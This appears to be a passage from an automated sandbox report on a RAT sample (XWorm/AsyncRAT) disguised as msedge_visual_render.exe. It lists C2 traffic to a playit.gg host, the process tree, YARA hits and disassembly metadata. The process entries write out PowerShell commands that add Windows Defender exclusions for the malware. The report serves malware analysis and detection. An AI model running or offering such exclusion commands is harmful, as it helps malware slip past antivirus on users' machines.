                                                                        Nov 15, 2024 22:12:02.710087061 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:02.759829998 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.765013933 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:02.775774002 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.781105995 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:02.822386980 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.827545881 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:02.838526011 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:02.843791962 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:03.822431087 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:03.827557087 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:03.932375908 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:03.940090895 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:04.106086969 CET4998557660192.168.2.5147.185.221.23
                                                                        Nov 15, 2024 22:12:04.111732006 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:11.065200090 CET5766049985147.185.221.23192.168.2.5
                                                                        Nov 15, 2024 22:12:11.073348999 CET4998557660192.168.2.5147.185.221.23

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 15, 2024 22:10:53.359515905 CET5083853192.168.2.51.1.1.1
                                                                        Nov 15, 2024 22:10:53.372193098 CET53508381.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 15, 2024 22:10:53.359515905 CET192.168.2.51.1.1.10xd763Standard query (0)23.ip.gl.ply.ggA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 15, 2024 22:10:53.372193098 CET1.1.1.1192.168.2.50xd763No error (0)23.ip.gl.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:16:10:01
                                                                        Start date:15/11/2024
                                                                        Path:C:\Users\user\Desktop\msedge_visual_render.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\msedge_visual_render.exe"
                                                                        Imagebase:0x3f0000
                                                                        File size:192'512 bytes
                                                                        MD5 hash:E796B778B392F06DE4D340EC0F88B4CC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:2
                                                                        Start time:16:10:05
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:16:10:05
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:16:10:11
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:16:10:11
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:16:10:19
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:16:10:19
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:16:10:33
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:16:10:33
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:16:11:03
                                                                        Start date:15/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\msedge.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\msedge.exe"
                                                                        Imagebase:0x720000
                                                                        File size:192'512 bytes
                                                                        MD5 hash:E796B778B392F06DE4D340EC0F88B4CC
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: ditekSHen
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 74%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:16:11:12
                                                                        Start date:15/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\msedge.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\msedge.exe"
                                                                        Imagebase:0xdf0000
                                                                        File size:192'512 bytes
                                                                        MD5 hash:E796B778B392F06DE4D340EC0F88B4CC
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:24.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:3
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 3779 7ff848f429fd 3780 7ff848f42a2f RtlSetProcessIsCritical 3779->3780 3782 7ff848f42ae2 3780->3782

                                                                          Executed Functions

                                                                          Function 00007FF848F41689 Relevance: 4.3, Strings: 3, Instructions: 503COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_L$W_H$SAL_^
                                                                          • API String ID: 0-3586993791
                                                                          • Opcode ID: 9ec3190844f5ef43d089a4b08b6955f65fc1575f87ceae8c7a2cb31e8f9df2ef
                                                                          • Instruction ID: 4ae45db7abf7c56354efdc510c38462e5e4a7588a876e52356281c0b1ac697eb
                                                                          • Opcode Fuzzy Hash: 9ec3190844f5ef43d089a4b08b6955f65fc1575f87ceae8c7a2cb31e8f9df2ef
                                                                          • Instruction Fuzzy Hash: 8EF1A130A2DA595FEB98FB3884797B976D2FF98750F40057AE40ED32C2DE28AC418745
                                                                          Function 00007FF848F47786 Relevance: .5, Instructions: 475COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 358 7ff848f47786-7ff848f47793 359 7ff848f4779e-7ff848f47867 358->359 360 7ff848f47795-7ff848f4779d 358->360 364 7ff848f47869-7ff848f47872 359->364 365 7ff848f478d3 359->365 360->359 364->365 366 7ff848f47874-7ff848f47880 364->366 367 7ff848f478d5-7ff848f478fa 365->367 368 7ff848f478b9-7ff848f478d1 366->368 369 7ff848f47882-7ff848f47894 366->369 374 7ff848f478fc-7ff848f47905 367->374 375 7ff848f47966 367->375 368->367 370 7ff848f47898-7ff848f478ab 369->370 371 7ff848f47896 369->371 370->370 373 7ff848f478ad-7ff848f478b5 370->373 371->370 373->368 374->375 377 7ff848f47907-7ff848f47913 374->377 376 7ff848f47968-7ff848f47a10 375->376 388 7ff848f47a7e 376->388 389 7ff848f47a12-7ff848f47a1c 376->389 378 7ff848f4794c-7ff848f47964 377->378 379 7ff848f47915-7ff848f47927 377->379 378->376 380 7ff848f4792b-7ff848f4793e 379->380 381 7ff848f47929 379->381 380->380 383 7ff848f47940-7ff848f47948 380->383 381->380 383->378 391 7ff848f47a80-7ff848f47aa9 388->391 389->388 390 7ff848f47a1e-7ff848f47a2b 389->390 392 7ff848f47a2d-7ff848f47a3f 390->392 393 7ff848f47a64-7ff848f47a7c 390->393 398 7ff848f47aab-7ff848f47ab6 391->398 399 7ff848f47b13 391->399 394 7ff848f47a43-7ff848f47a56 392->394 395 7ff848f47a41 392->395 393->391 394->394 397 7ff848f47a58-7ff848f47a60 394->397 395->394 397->393 398->399 401 7ff848f47ab8-7ff848f47ac6 398->401 400 7ff848f47b15-7ff848f47ba6 399->400 409 7ff848f47bac-7ff848f47bbb 400->409 402 7ff848f47ac8-7ff848f47ada 401->402 403 7ff848f47aff-7ff848f47b11 401->403 405 7ff848f47ade-7ff848f47af1 402->405 406 7ff848f47adc 402->406 403->400 405->405 407 7ff848f47af3-7ff848f47afb 405->407 406->405 407->403 410 7ff848f47bbd 409->410 411 7ff848f47bc3-7ff848f47c28 call 7ff848f47c44 409->411 410->411 418 7ff848f47c2a 411->418 419 7ff848f47c2f-7ff848f47c43 411->419 418->419
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cbe67d10bde0e178aec13def3ec34b00011f2202cd56086646fc073a0eb20c50
                                                                          • Instruction ID: 57e87190870a57f7e4adb766968852d300f3dea77e37a2f1c7b3b654da362ea4
                                                                          • Opcode Fuzzy Hash: cbe67d10bde0e178aec13def3ec34b00011f2202cd56086646fc073a0eb20c50
                                                                          • Instruction Fuzzy Hash: 10F1C43090CA8D8FEBA8EF28C8557E977E1FF64340F14426EE84DC7291DB7499448B82
                                                                          Function 00007FF848F48532 Relevance: .5, Instructions: 461COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 420 7ff848f48532-7ff848f4853f 421 7ff848f4854a-7ff848f48617 420->421 422 7ff848f48541-7ff848f48549 420->422 426 7ff848f48619-7ff848f48622 421->426 427 7ff848f48683 421->427 422->421 426->427 429 7ff848f48624-7ff848f48630 426->429 428 7ff848f48685-7ff848f486aa 427->428 435 7ff848f486ac-7ff848f486b5 428->435 436 7ff848f48716 428->436 430 7ff848f48669-7ff848f48681 429->430 431 7ff848f48632-7ff848f48644 429->431 430->428 433 7ff848f48648-7ff848f4865b 431->433 434 7ff848f48646 431->434 433->433 437 7ff848f4865d-7ff848f48665 433->437 434->433 435->436 438 7ff848f486b7-7ff848f486c3 435->438 439 7ff848f48718-7ff848f4873d 436->439 437->430 440 7ff848f486fc-7ff848f48714 438->440 441 7ff848f486c5-7ff848f486d7 438->441 445 7ff848f4873f-7ff848f48749 439->445 446 7ff848f487ab 439->446 440->439 442 7ff848f486d9 441->442 443 7ff848f486db-7ff848f486ee 441->443 442->443 443->443 447 7ff848f486f0-7ff848f486f8 443->447 445->446 448 7ff848f4874b-7ff848f48758 445->448 449 7ff848f487ad-7ff848f487db 446->449 447->440 450 7ff848f4875a-7ff848f4876c 448->450 451 7ff848f48791-7ff848f487a9 448->451 456 7ff848f487dd-7ff848f487e8 449->456 457 7ff848f4884b 449->457 452 7ff848f4876e 450->452 453 7ff848f48770-7ff848f48783 450->453 451->449 452->453 453->453 455 7ff848f48785-7ff848f4878d 453->455 455->451 456->457 459 7ff848f487ea-7ff848f487f8 456->459 458 7ff848f4884d-7ff848f48925 457->458 469 7ff848f4892b-7ff848f4893a 458->469 460 7ff848f487fa-7ff848f4880c 459->460 461 7ff848f48831-7ff848f48849 459->461 463 7ff848f4880e 460->463 464 7ff848f48810-7ff848f48823 460->464 461->458 463->464 464->464 465 7ff848f48825-7ff848f4882d 464->465 465->461 470 7ff848f4893c 469->470 471 7ff848f48942-7ff848f489a4 call 7ff848f489c0 469->471 470->471 478 7ff848f489ab-7ff848f489bf 471->478 479 7ff848f489a6 471->479 479->478
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cc181880b29541b935a256b694deb7bf3f83a29583f003361baf82acb0e13f8
                                                                          • Instruction ID: 4da50a9eff0b9e694f6ae4ce582684a61a8e4904bfe90793edc2deb0fb7ac655
                                                                          • Opcode Fuzzy Hash: 0cc181880b29541b935a256b694deb7bf3f83a29583f003361baf82acb0e13f8
                                                                          • Instruction Fuzzy Hash: 25E1C23091CA4E8FEBA8EF28C8557E977D1FF64750F54426ED84DC7291DB78A8408B81
                                                                          Function 00007FF848F429FD Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 135 7ff848f429fd-7ff848f42ae0 RtlSetProcessIsCritical 139 7ff848f42ae8-7ff848f42b1d 135->139 140 7ff848f42ae2 135->140 140->139
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3346217520.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff848f40000_msedge_visual_render.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: c78b5f63b98c30da9809f5112298c5e1052bf263f6c0a2da1c147f059f5d7269
                                                                          • Instruction ID: 9e9ae7cc7a1918359ae20a87bdca457ce27f3911e7901937b7932f4cddde5818
                                                                          • Opcode Fuzzy Hash: c78b5f63b98c30da9809f5112298c5e1052bf263f6c0a2da1c147f059f5d7269
                                                                          • Instruction Fuzzy Hash: 0241C23180C6588FD719DF98D849BE9BBF0FF56311F04416EE08AD3692CB786846CB91

                                                                          Executed Functions

                                                                          Function 00007FF848FE6651 Relevance: 7.9, Strings: 6, Instructions: 390COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B"I$(B"I$(B"I$(B"I$(B"I$X7E
                                                                          • API String ID: 0-1854128441
                                                                          • Opcode ID: e3c82ee329dc31f34d1d8ccaa447df9890307c8d4e652d40bf09526bd5cf6544
                                                                          • Instruction ID: e3ec5c9461b907a6b5f37704eb632135b4b92a3738c520dca5391de68af9b274
                                                                          • Opcode Fuzzy Hash: e3c82ee329dc31f34d1d8ccaa447df9890307c8d4e652d40bf09526bd5cf6544
                                                                          • Instruction Fuzzy Hash: 0DC1FE31D1EA8E5FEB94EB2858595B9BBA1EF15394F1401BAD40DC70D3EA2CA801C355
                                                                          Function 00007FF848FE431D Relevance: 5.3, Strings: 4, Instructions: 315COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (7E$B$p>"I$p>"I
                                                                          • API String ID: 0-3162089516
                                                                          • Opcode ID: fa275727d904eee3b7255422af79680a2c15642cc9447bdb7f45cf1435ad29c4
                                                                          • Instruction ID: 9c7971da7781aef2a4a564eb729f928f36f251e0352a07c4534dc95f72a98bd8
                                                                          • Opcode Fuzzy Hash: fa275727d904eee3b7255422af79680a2c15642cc9447bdb7f45cf1435ad29c4
                                                                          • Instruction Fuzzy Hash: 0A911431E0EA894FE796EB2858191B47BE0EF66660F0901FFD049C75D3DB1CAC168396
                                                                          Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>"I
                                                                          • API String ID: 0-2459728092
                                                                          • Opcode ID: 8a34fb98cdc05aec38f64929da3299198f06f0db5d19c52c59bbbbfb17638b11
                                                                          • Instruction ID: e9b3853bcf23ff748969a0ceb1b5332b73edc3bffd9410ce56f65c8bf0464563
                                                                          • Opcode Fuzzy Hash: 8a34fb98cdc05aec38f64929da3299198f06f0db5d19c52c59bbbbfb17638b11
                                                                          • Instruction Fuzzy Hash: A051B132A0DE864FEB9AAB2C941167577E1EFA5260F1801BEC11EC71D2DF1CE805825A
                                                                          Function 00007FF848FE40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>"I
                                                                          • API String ID: 0-2459728092
                                                                          • Opcode ID: de2a4410d9d6aff9546a3863bc3aa53cdb9ebfaba37fa893d51a0ee7ebc018d1
                                                                          • Instruction ID: 3b12429f685c495853145ec733d02081d089ca37deed87f690604cbf95127c10
                                                                          • Opcode Fuzzy Hash: de2a4410d9d6aff9546a3863bc3aa53cdb9ebfaba37fa893d51a0ee7ebc018d1
                                                                          • Instruction Fuzzy Hash: 59218E32D0EE864FEBAAEB28945117566D1FF74290F5901BEC11EC71E2CF1CDC04864A
                                                                          Function 00007FF848FE6806 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B"I
                                                                          • API String ID: 0-2674835063
                                                                          • Opcode ID: 5cf6c3fd92cdb352a9a8cfc59e7d24288a2856d68728887574bbddc1bc5918cb
                                                                          • Instruction ID: 5b66cf6c4bf521268eb284258d9076fd6f38b3405dd2e5ab5fa9dde87fca774c
                                                                          • Opcode Fuzzy Hash: 5cf6c3fd92cdb352a9a8cfc59e7d24288a2856d68728887574bbddc1bc5918cb
                                                                          • Instruction Fuzzy Hash: EC11BF71E0EA8A9FE795EF589494278B7E1EF18361F2401BEC14CD71C2EA2CA845C354
                                                                          Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2145380080.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>"I
                                                                          • API String ID: 0-3426486286
                                                                          • Opcode ID: 1880f959c75b80cb59d2c4bd57169871f2e3631d25ccbfc923268a8fa191def8
                                                                          • Instruction ID: 98a3149b7e0d8eefe461cc7aeebf2b3e123239796a4201cc5868a1f00e85d53b
                                                                          • Opcode Fuzzy Hash: 1880f959c75b80cb59d2c4bd57169871f2e3631d25ccbfc923268a8fa191def8
                                                                          • Instruction Fuzzy Hash: A311CE32E0ED864FEBA4EB28A4505B877E1FF64760F4900BAD41DC75E6DB1CAC148396
                                                                          Function 00007FF848F19EF3 Relevance: .3, Instructions: 278COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae1afb398f5e0a0d55d2e51ec982b0df254dcdf3e7d0420a8e59747e38e23551
                                                                          • Instruction ID: 3924c7a769c6f6a323f6179a4d90a80c155f4d5222e6ee5b8c173c07f0c3bd3a
                                                                          • Opcode Fuzzy Hash: ae1afb398f5e0a0d55d2e51ec982b0df254dcdf3e7d0420a8e59747e38e23551
                                                                          • Instruction Fuzzy Hash: 09813C33D0D9925FE316BB7CA8660E577A0FF11BA9F0801B6C48C8E0D3EE185C568799
                                                                          Function 00007FF848F19768 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f86e8ee523d8b8d855e729992015ff41176bbf48da720fa40deabf0a9e68902f
                                                                          • Instruction ID: 310696b3949a58febec5be80fe1a3a96cc51f548f3d3eeca1649f523cb213c6e
                                                                          • Opcode Fuzzy Hash: f86e8ee523d8b8d855e729992015ff41176bbf48da720fa40deabf0a9e68902f
                                                                          • Instruction Fuzzy Hash: C131F63191CB488FDB1C9F5CA8066B97BE1FB99710F00422FE449D3692CB64A856CBC2
                                                                          Function 00007FF848DFE620 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144588134.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848dfd000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8239f779623cfeaa728e8f28e333060d83943e42eb6659bf3730689715442e51
                                                                          • Instruction ID: 2bc74489960aedaf038f194b86420344a6c4455d93443044e7527f03a23d151b
                                                                          • Opcode Fuzzy Hash: 8239f779623cfeaa728e8f28e333060d83943e42eb6659bf3730689715442e51
                                                                          • Instruction Fuzzy Hash: 4141287180EBC44FE7569B389845A523FF0EF56360F1505DFE088CF1A3D625A84AC7A2
                                                                          Function 00007FF848F1A47C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7dd4a85cfa7b9921c8c291c9c6a22a3f08625701ec0facd56845cb7fe72d226a
                                                                          • Instruction ID: 5b8b3ee82c3ca9e3619e88e8d86c5f33dc66a5c1480d88ec3239f9f93954686a
                                                                          • Opcode Fuzzy Hash: 7dd4a85cfa7b9921c8c291c9c6a22a3f08625701ec0facd56845cb7fe72d226a
